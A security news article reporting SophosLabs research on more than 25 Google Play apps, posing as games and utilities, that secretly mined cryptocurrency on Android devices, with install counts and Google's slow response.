14 DAY TRIAL // As unveiled in a report by SophosLabs' Pankaj Kohli, Google Play is distributing malicious applications posing as games, educational tools or system utilities but use your Android device to mine for cryptocurrency.
Cryptojacking is still a very lucrative business for threat actors because of the small investment and the vast potential gains although most crypto coins have gone through a harsh time lately.
It comes as no surprise that bad actors are still trying their hand at targeting Android devices using apps that stealthily mine for cryptocurrency, while also providing the appearance of a legitimate application to avoid detection.
Kohli details in his report how he found that more than 25 apps with more than 120,000 installs distributed through the Google Play store have been secretly mining for crypto coins using stolen processing power.
All these apps will use CPU throttling to make sure that the devices they use for mining don't overheat or become generally unusable, an intelligent move if you're an attacker who wants to avoid detection after compromising a target device.
Most apps have been removed from Google Play, but there are some still available for download
While the vast majority of these malicious Android applications are running miner code hosted on coinhive.com, there are some which use their own servers' services for hosting.
This might be a possible attempt of either fooling the automated app analysis tools set up by Google to detect and block crypto jackers from entering the Google Play market or preventing their apps being blocked by firewalls or reputation-based services.
Moreover, although most of these apps have already been removed by Google, there are some such as LightOn (with 500+ installs) which are still available in the store.
Furthermore, even though most of the cryptojacking apps spotted by Kohli in the Google Play market mine for Monero, there are exceptions, with "A Paintbox for Kids" by Uwe Post being capable of mining for various coins using the open source XMRig miner being the prime example.
Kohli's report also says that Google has been notified about the presence of these new cryptocurrency mining apps in the official Android app store in August, but it seems that the Mountain View company is taking its sweet time in closely looking into each of them.
